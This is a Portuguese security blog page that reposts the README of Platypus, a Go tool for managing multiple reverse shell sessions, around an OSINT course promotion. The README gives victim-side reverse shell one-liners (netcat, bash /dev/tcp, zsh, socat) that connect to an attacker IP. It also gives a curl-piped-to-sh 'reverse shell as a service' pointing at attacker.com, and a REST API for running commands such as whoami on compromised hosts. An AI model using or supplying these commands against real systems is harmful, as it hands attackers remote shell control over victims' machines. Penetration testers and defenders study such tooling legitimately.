Pular para o conteúdo principal

Compartilhe

Open Source Intelligence by @RDSWEB

OSINT — Curso de Open Source Intelligence by @RDSWEB Minuta Técnica · Curso Profissional Inteligência de Fontes Abertas OSINT — Open Source Intelligence · by @RDSWEB 📡 Formação analítica aplicada à ciberinteligência e investigação digital Sobre o programa O que é este curso? O Curso de OSINT by @RDSWEB é um programa de formação técnica voltado a analistas, profissionais de segurança, investigadores digitais e entusiastas que desejam dominar as metodologias e ferramentas de Inteligência de Fontes Abertas (Open Source Intelligence) . O treinamento capacita o profissional a coletar, correlacionar e analisar informações publicamente disponíveis na internet com fins de investigação , due diligence, segurança cibernética, jornalismo de dados e compliance. P #OSINT — Curso de OSINT by @RDSWEB Apresentaç...
Postar um comentário
Read more »
Marcadores

Platypus - A Modern Multiple Reverse Shell Sessions Manager Written In Go

Platypus - A Modern Multiple Reverse Shell Sessions Manager Written In Go

  | POST SPONSORED BY FARADAYSEC | MULTIUSER PENTEST ENVIRONMENT
   


A modern multiple reverse shell sessions/clients manager via terminal written in go.

Features
  • Multiple service listening port
  • Multiple client connections
  • RESTful API
  • Reverse shell as a service

faraday

Screenshot



Network Topology
Attack IP: 192.168.1.2
    Reverse Shell Service: 0.0.0.0:8080
    RESTful Service: 127.0.0.1:9090
Victim IP: 192.168.1.3

Run Platypus from source code
go get github.com/WangYihang/Platypus
cd go/src/github.com/WangYihang/Platypus
go run platypus.go

Run Platypus from release binaries
// Download binary from https://github.com/WangYihang/Platypus/releases
chmod +x ./Platypus_linux_amd64
./Platypus_linux_amd64

Victim side
nc -e /bin/bash 192.168.1.2 8080
bash -c 'bash -i >/dev/tcp/192.168.1.2/8080 0>&1'
zsh -c 'zmodload zsh/net/tcp && ztcp 192.168.1.2 8080 && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.1.2:8080

Reverse shell as a Service
// Platypus is able to multiplexing the reverse shell listening port
// The port 8080 can receive reverse shell client connection
// Also these is a Reverse shell as a service running on this port

// victim will be redirected to attacker-host attacker-port
// sh -c "$(curl http://host:port/attacker-host/attacker-port)"
# curl http://192.168.1.2:8080/attacker.com/1337
bash -c 'bash -i >/dev/tcp/attacker.com/1337 0>&1'
# sh -c "$(curl http://192.168.1.2:8080/attacker.com/1337)"

// if the attacker info not specified, it will use host, port as attacker-host attacker-port
// sh -c "$(curl http://host:port/)"
# curl http://192.168.1.2:8080/
curl http://192.168.1.2:8080/192.168.1.2/8080|sh
# sh -c "$(curl http://host:port/)"

RESTful API
  • GET /client List all online clients
# curl 'http://127.0.0.1:9090/client'
{
    "msg": [
        "192.168.1.3:54798"
    ],
    "status": true
}
  • POST /client/:hash execute a command on a specific client
# curl -X POST 'http://127.0.0.1:9090/client/0723c3bed0d0240140e10a6ffd36eed4' --data 'cmd=whoami'
{
    "status": true,
    "msg": "root\n",
}
  • How to hash?
# echo -n "192.168.1.3:54798" | md5sum
0723c3bed0d0240140e10a6ffd36eed4  -


Enviar esta postagem
Labels:

Comentários

Postar um comentário

Manual de Fontes Abertas

CLICA

Pericia Digital

Como usar um Agente OSINT IA

Postagens mais visitadas